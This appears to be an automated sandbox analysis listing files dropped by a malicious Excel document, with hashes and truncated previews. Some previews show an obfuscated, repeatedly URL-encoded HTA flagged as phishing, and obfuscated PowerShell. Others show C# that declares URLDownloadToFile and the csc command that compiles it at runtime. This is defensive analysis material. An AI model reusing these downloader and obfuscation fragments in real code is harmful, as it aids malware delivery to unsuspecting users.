                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):15189
                                                                      Entropy (8bit):5.0343247648743
                                                                      Encrypted:false
                                                                      SSDEEP:384:nWraVoGIpN6KQkj2Lkjh4iUxTnaVjvCnS/OdBmRWDf:nW+V3IpNBQkj2Oh4iUxDaVjvCnS/OdBD
                                                                      MD5:7BC3FB6565E144A52C5F44408D5D80DF
                                                                      SHA1:C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77
                                                                      SHA-256:EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
                                                                      SHA-512:D0A936BAF2277884518EDF4729F88DA74C7BAA5BBB58C1060CE66DE92A23694EA993CA69D8820816C5D28182E9A38EE59DE821EE3A73F0D85DBBC74D406285A5
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........V.7...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........._.7...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):0.34726597513537405
                                                                      Encrypted:false
                                                                      SSDEEP:3:Nlll:Nll
                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                      Malicious:false
                                                                      Preview:@...e...........................................................

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthings[1].hta

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                      Category:modified
                                                                      Size (bytes):204989
                                                                      Entropy (8bit):2.0035970583268288
                                                                      Encrypted:false
                                                                      SSDEEP:1536:RZ7yLk8TCV/QtwkHTCV/Qta9LiBPxBfOrXa9zDzFzDzbfQP/OkOk0TCV/QtOky:RV
                                                                      MD5:B89E0D07BAC575AA9381611FA00EA4A0
                                                                      SHA1:53A71EFFB8401E97F8E8E1F2522A0289E2B58745
                                                                      SHA-256:6BFA3B21293AD79037E13886FD6B0B3C0EE8AFDC1422BA2748ADE815DB010AA7
                                                                      SHA-512:825A4C2A185A039B92CC5BABF6797E6BDE8FFFE64B2F04DE45D20F85471C5F8A2C2C2DDE476B7C4E85029D21B2A291A3A70DCAAD76563AAD5E98D29BAC9DD644
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_HtmlPhish_44, Description: Yara detected HtmlPhish_44, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthings[1].hta, Author: Joe Security
                                                                      Preview:<script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253CScript%252520Language%25253D%252527Javascript%252527%25253E%25250A%25253C%252521--%252520HTML%252520Encryption%252520provided%252520by%252520tufat.com%252520--%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%252527%2525253C%25252521%25252544%2525254F%25252543%25252554%25252559%25252550%25252545%25252520%25252568%25252574%2525256D%2525256C%2525253E%2525250A%2525253C%2525256D%25252565%25252574%25252561%25252520%25252568%25252574%25252574%25252570%2525252D%25252565%25252571%25252575%25252569%25252576%2525253D%25252522%25252558%2525252D%25252555%25252541%2525252D%25252543%2525256F%2525256D%25252570%25252561%25252574%25252569%25252562%2525256C%25252565%25252522%25252520%25252563%2525256F%2525256E%25252574%25252565%2525256E%25252574%2525253D%25252522%25252549%25252545%2525253D%25252545%2525256D%25252575%2525256C%25252561%25252574%252

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seemebestthingswithentirethingswithgreatnaturethings[1].tiff

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (429), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):166446
                                                                      Entropy (8bit):3.894631434751547
                                                                      Encrypted:false
                                                                      SSDEEP:3072:zPTYr5SAsQ5NIUHFlPTYr5SAsQ5NIUH5PTYr5SAsQ5NIUH2:zPTs5SANIUllPTs5SANIUZPTs5SANIUW
                                                                      MD5:33ACA5E4AA52362C54EA2A709581C47B
                                                                      SHA1:5FE650034F1FBE7C15477ECD16D2E95D14505C4A
                                                                      SHA-256:832FCD0838977003D89333EC7A0EAE20E9B00BB5DA21047F93FBECC793B2A03E
                                                                      SHA-512:64AA6372746DCD76178A0759CB12C95F31F31B748D8403CF7083512C6F606B065B78850EAED6BBECFCB7FCF1DE6C32A8B6CF5D620B0969E554A2378F6A2F3F61
                                                                      Malicious:false
                                                                      Preview:..........K.L.c.v.K.W.Z.L.L.B.G.B.g.i.L. .=. .".K.W.t.r.i.c.l.i.n.i.a.r.c.h.a.L.j.x.m.q.A.c.A.U.a.r.".....g.b.h.x.G.P.p.K.m.U.o.b.W.Q.p. .=. .".c.c.W.b.N.W.k.O.k.i.L.U.i.H.A.".....S.A.K.N.t.n.e.k.A.P.U.W.L.z.z. .=. .".b.W.K.i.B.K.h.H.G.e.d.d.C.K.b.".....m.W.a.J.a.m.o.P.p.v.Z.h.N.i.k. .=. .".z.o.S.A.K.n.d.O.e.W.q.G.O.L.c.".....K.C.I.L.a.b.R.x.P.J.W.t.G.u.g. .=. .".S.H.f.g.J.R.L.e.c.Z.P.c.i.r.i.".....K.c.b.L.x.L.p.a.c.t.h.u.W.b.Z. .=. .".I.p.h.W.p.m.h.g.G.B.d.K.J.q.B.".........L.d.G.W.A.a.h.k.c.P.L.L.k.W.P. .=. .".A.L.K.f.W.b.z.c.K.G.m.O.J.m.W.".....c.K.i.Q.W.W.n.v.I.L.l.L.W.C.u. .=. .".W.Z.m.G.q.q.L.t.i.L.Z.R.K.J.c.".....t.p.c.W.P.n.P.W.G.H.P.d.O.m.K. .=. .".o.R.R.C.N.W.e.U.e.L.z.L.v.p.O.".........s.U.A.l.H.k.x.L.g.G.K.k.o.c.u. .=. .".k.i.m.A.j.I.i.e.x.L.q.P.l.x.u.".....Z.l.L.A.i.K.T.p.c.R.K.L.I.K.i. .=. .".K.g.W.h.p.d.B.a.K.K.L.h.K.C.u.".....o.m.L.L.m.L.C.j.z.U.L.z.L.B.A. .=. .".W.m.u.W.v.B.W.g.L.z.h.O.h.c.L.".....j.c.q.S.W.c.O.Z.W.p.N.A.i.u.t. .=. .".d.z.G.h.L.Z.h.L.A.J.k.W.N.h.W."...

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1F73576A.emf

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                      Category:dropped
                                                                      Size (bytes):2351842
                                                                      Entropy (8bit):3.465507143020907
                                                                      Encrypted:false
                                                                      SSDEEP:6144:+22B22B22t22J22J22J22622V22u22822Rwi7v2t22W2922O2O22r2r22422e22f:hsUfJ444Tg0g0gNsUfJ444Tg0g0gM
                                                                      MD5:0FE86A63C62B7478BD1542945DB58A7F
                                                                      SHA1:78C4D9A2A3525D2E0D634F5E8BED732BDD16847C
                                                                      SHA-256:FAECC5D378189130757D69D053608EFF89AE8E46CA773305AF3EF2C838BA0207
                                                                      SHA-512:98B6BEC2BF92027425C710776244FA562B69E2858FDCA303AB7137CAAF23CEE1393F5212155B4778BE0A2B7CA008DF841998F2F8F6F5C6F80E6332AC94494320
                                                                      Malicious:false
                                                                      Preview:....X...........A....................... EMF......#..................... ...X...........F...$.......GDIC........@.................................&...............Word..Microsoft Word............................................Courier New.......-................................@..Times New Roman.......-.....................................&.......................................C. .....#...............(.......#...............]7..]7......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\21371827.emf

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                      Category:dropped
                                                                      Size (bytes):1500652
                                                                      Entropy (8bit):0.38359994376437007
                                                                      Encrypted:false
                                                                      SSDEEP:12:YqZLEoorjllmvtoEEERttoERtt44fzWbx7PkyWa2+12p7p+pNGiYGfMqMj2ENva0:YmLyrZG
                                                                      MD5:E099B0811373326BD60BEB4380FC2DCD
                                                                      SHA1:8A10955F72FF0A16AB991FE620D460444AE70300
                                                                      SHA-256:ECB7507C68931C9EDDED0DA5FB7F7A9A0D4FDA9A22CD24A177083B1EF485F45F
                                                                      SHA-512:86C13084C0FACD4FBA0B491E88E2A324BF4098B10D384C9C7DE2D5A06606943294B61DFF12A256285AFDE7F864374BF11064F27F4978365B8E0C7A73228C7EF2
                                                                      Malicious:false
                                                                      Preview:....l...........Q...H............)...;.. EMF................................8...X....................?...........................................)...;..........R...I...Q...0...........Q...H...................R...I...P...(...x........... ....)...;..(...R...I.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\54F2A53E.emf

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                      Category:dropped
                                                                      Size (bytes):146860
                                                                      Entropy (8bit):2.796455595167375
                                                                      Encrypted:false
                                                                      SSDEEP:3072:YssSm/SacgbNk86RW7wRyFJgUiwJ6rvI9JxZKlEJfK1QVuIX0YTRJWgVTaI6mmpe:o6vmurYEozhngbQXg6FOEXvjDZ/ybuh9
                                                                      MD5:DBE385F855DE00AC91E71C45E36EB343
                                                                      SHA1:0FCD7FC4BFC0A231CCE5EFD51C47C88CF8935F99
                                                                      SHA-256:0F05517138D391C679580AC33C248ED934E25E9D76958E730EDAE3605C2FBBD3
                                                                      SHA-512:5DD425C4C71173160AB532B5DD1E3267157A8E03D1CCF34C1E0EA152002BEF44DC0A5FA1DABCC6D94D3924DD6DB13F348F529B82E52CD4E333F2392D4F177A5A
                                                                      Malicious:false
                                                                      Preview:....l...............`............B...... EMF.....=..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................a..."...........!...................................................a..."...........!...................................................a..."...........!...................................................a..."...........!...................................................a...'......................%..........................................................L...d...............:...............;...!..............?...........?................................'.......................%...........(.......................L...d.......:.......t.......:.......

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83AE5BCD.emf

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                      Category:dropped
                                                                      Size (bytes):330948
                                                                      Entropy (8bit):4.975044135667186
                                                                      Encrypted:false
                                                                      SSDEEP:3072:j0Bd8yCKdQW2222222Igccz3/qSmV1XITSuaZgOTARfMDc1ji:j0Bd8yCKdQRzw4muaZ9TARfMDcFi
                                                                      MD5:F9157BC2C7748EC147ACF123E0B02E27
                                                                      SHA1:35F6DAC30F90C2B97C9A56C041DB3C7FEC5C4D89
                                                                      SHA-256:CCD5744ED8D269CD48305EDFA526AFE15C96A9374B0B4EF049F658C4772775D0
                                                                      SHA-512:3DCE24241BD64DC84F363DF2DF70191F6A6D98233A42AD283448A3C31D11095DE00483D6AD42E9F30BFE3FD8B16F64F3020C52A0A28CE634C0457A6C4E2873DE
                                                                      Malicious:false
                                                                      Preview:....l...........0...%............K...8.. EMF........l.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................1...&..."...........!...............................................1...&..."...........!...............................................1...&..."...........!...............................................1...&..."...........!...............................................1...&...'.......................%...........................................................L...d.......W...0...........W...1...T...!..............?...........?................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E2E61FF1.emf

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                      Category:dropped
                                                                      Size (bytes):5245540
                                                                      Entropy (8bit):2.8300524177296125
                                                                      Encrypted:false
                                                                      SSDEEP:12288:Km6vmurYEozhngbQXg6FOEXvjDZ/ybuhVc3WWZEPB4V9GsYzVyYLZ9JnqABhphgY:/Z5N
                                                                      MD5:5AF3250B7B9FF11B3D428C96FA6210C6
                                                                      SHA1:6A564F4024D6FD7A8165BFA3054BC5C5200B79D0
                                                                      SHA-256:46EF4BE8511882901BB4127D7050942D4EF6CA9C034F85967385F9847CAB594D
                                                                      SHA-512:19363B20791B203CF91446990E2BD316D2AE7A41C6CD37A350F4C15EE8A41EDFD50A47F13AD514D1A720B74D6407E940F17BEB2FD71645867B56C9EB3BCFDACE
                                                                      Malicious:false
                                                                      Preview:....l............................i...^.. EMF....d.P.$)..3...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................C..."...........!...................................................C..."...........!...................................................C..."...........!...................................................C..."...........!...................................................C...'.......................%...........................................................L...d...........w...p...........x...q...!..............?...........?................................'.......................%...........(.......................L...d.......p...]...........p...^...

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FF3AC3FC.emf

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                      Category:dropped
                                                                      Size (bytes):591648
                                                                      Entropy (8bit):2.3082558364276564
                                                                      Encrypted:false
                                                                      SSDEEP:1536:hrYfIrWts4Myv05BgE8YE27f6cPtG7Mc/izMjVh:Nr+s4ME0wh
                                                                      MD5:0085835A9F812794B771FBAF0F04A6BE
                                                                      SHA1:4B7B69212A1ED3F10D7327AF9B0A1F4A5C398E53
                                                                      SHA-256:559F83929E62E12E00F5A3BEA7006914569212C7CA452142B1844DFB46009274
                                                                      SHA-512:6852420090DD276C6595005573482147312B7C4A85C12A8EF9A82141F3008FB1FF2C4BF6C95E44F14D515FFE7185263038EA431AB952FDCB69872529A348C852
                                                                      Malicious:false
                                                                      Preview:....l...........^...r...........QN...a.. EMF.... ...........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......

                                                                      C:\Users\user\AppData\Local\Temp\RESADA.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Nov 28 06:28:14 2024, 1st section name ".debug$S"
                                                                      Category:dropped
                                                                      Size (bytes):1328
                                                                      Entropy (8bit):3.9785053626481903
                                                                      Encrypted:false
                                                                      SSDEEP:24:Hwe9E2UkB+kRHbwKdNwI+ycuZhN0akSQPNnqSqd:oiRsKdm1ul0a3IqSK
                                                                      MD5:E82B2A187E51C48C2C5E0B7ACCB6BF44
                                                                      SHA1:631F4A227CD358970BB1B6F8109879D2009BD9DE
                                                                      SHA-256:058D5585959E4880C964BC4B46629077DE4274874BFA9CAAC401391FF0948701
                                                                      SHA-512:81396E007F57B1D10E37BF3A63F44A58452377FAF7324AF347987AA06A20557D80D040631EEF0176D4245058C6C8A256E179D395FB36316D4722F362E21E947A
                                                                      Malicious:false
                                                                      Preview:L...~.Hg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\rpgvm2d4\CSCF316C6EB41654F6E91711E8CA420E01A.TMP....................'uOF.%H..C..........3.......C:\Users\user\AppData\Local\Temp\RESADA.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.p.g.v.m.2.d.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                      C:\Users\user\AppData\Local\Temp\cgn0xxrr.xys.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1

                                                                      C:\Users\user\AppData\Local\Temp\fq2a5kyz.dbf.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1

                                                                      C:\Users\user\AppData\Local\Temp\ihrdy0tt.piv.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1

                                                                      C:\Users\user\AppData\Local\Temp\j2p1dpcx.biu.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1

                                                                      C:\Users\user\AppData\Local\Temp\k1rszaqi.mg2.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1

                                                                      C:\Users\user\AppData\Local\Temp\qooizzet.44e.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1

                                                                      C:\Users\user\AppData\Local\Temp\rpgvm2d4\CSCF316C6EB41654F6E91711E8CA420E01A.TMP

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                      File Type:MSVC .res
                                                                      Category:dropped
                                                                      Size (bytes):652
                                                                      Entropy (8bit):3.1020654347457133
                                                                      Encrypted:false
                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grySak7YnqqQPN5Dlq5J:+RI+ycuZhN0akSQPNnqX
                                                                      MD5:9AB2F7EF851827754F46AC2548DDFD43
                                                                      SHA1:A36AADAFF168DCF6F7D6899A718757D71F62018D
                                                                      SHA-256:323D064128A920C79787164CE2793750DEA62C3AA8A16AF4BF09D6706371E269
                                                                      SHA-512:E19DC465335BBB6534E3354FD723F1BAFA051CE3DA7099F0AE69B5505DA4A5DB09561021D0C3352D4E638CB77FB79B4E7C991B938AB0F16641A665F5BD251DE1
                                                                      Malicious:false
                                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.p.g.v.m.2.d.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...r.p.g.v.m.2.d.4...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                      C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.0.cs

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
                                                                      Category:dropped
                                                                      Size (bytes):474
                                                                      Entropy (8bit):3.855329279868913
                                                                      Encrypted:false
                                                                      SSDEEP:6:V/DsYLDS81zuMUhDoLkmMenQXReKJ8SRHy4HKKm7w+5bmJ7y:V/DTLDfuuLGXfHOnH5CFy
                                                                      MD5:1C21E300AA84E974598ED1030235CED2
                                                                      SHA1:291AF9A40735B871EF010A3D5318EDE7C831D931
                                                                      SHA-256:3E868570530D620E7562624BF45CB78C040D2152A5971C70ADE1E1F8AF86F6FF
                                                                      SHA-512:1B2BA5972F35A490AFC594B217065694972C513C1FA29ED38B68C21081BBF1E58CCC21D97297EC0F43710256B67BFF8D97B749AB59B7DB1E666E3F402316FFBE
                                                                      Malicious:false
                                                                      Preview:.using System;.using System.Runtime.InteropServices;..namespace Aw.{. public class jLbfTJrSIuj. {. [DllImport("uRLMon", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr FNpJIKp,string yGOsLMc,string rAnbPN,uint XnVbrC,IntPtr khzsGiOK);.. }..}.

                                                                      C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.cmdline

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):369
                                                                      Entropy (8bit):5.256597576036729
                                                                      Encrypted:false
                                                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fjR6zxs7+AEszIP23fjR0An:p37Lvkmb6Kz0WZEoGA
                                                                      MD5:7088B7D284EDA93862713E629DA957DF
                                                                      SHA1:F3BE418A577229F36BBB1558928589CAEB2F149C
                                                                      SHA-256:128B4D5661125BC9219F5612D2CA397FAF75D615852935CE1B982E0D8BEBD7BF
                                                                      SHA-512:661A1F81496D3A623682E87A07B7DC88066CA2D2E03615C6F8BE83ECCF0FBB8678457099EBE7EE39AA6EF6AC8B91AEFEC6FC88992D864FCE52A3476A7B226D50
                                                                      Malicious:true
                                                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.0.cs"

                                                                      C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.dll

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):3072
                                                                      Entropy (8bit):2.843846955136265
                                                                      Encrypted:false
                                                                      SSDEEP:24:etGSiPBe5ekrl8stgkclqnhDtbs6PtkZfq8bCZ0WI+ycuZhN0akSQPNnq:6Jskr+9l+tAJq8bCZX1ul0a3Iq
                                                                      MD5:FD533B3056E025996FA1893520F11B43
                                                                      SHA1:A63D72E46A67D98E404D587010AD136457119F63
                                                                      SHA-256:506708011A53D14576E578E1ED5A8DA88C46FD1D31A242AF1DCF4800ACE3AA97
                                                                      SHA-512:41BF244D8595331B9D7E4DD704D9A52F629C7E93E52A4D75334A5E79E6BC70A822DE083892CF62A99977CB54A37F59B9151DEB085BBC35930AE606CDF0E113A6
                                                                      Malicious:false
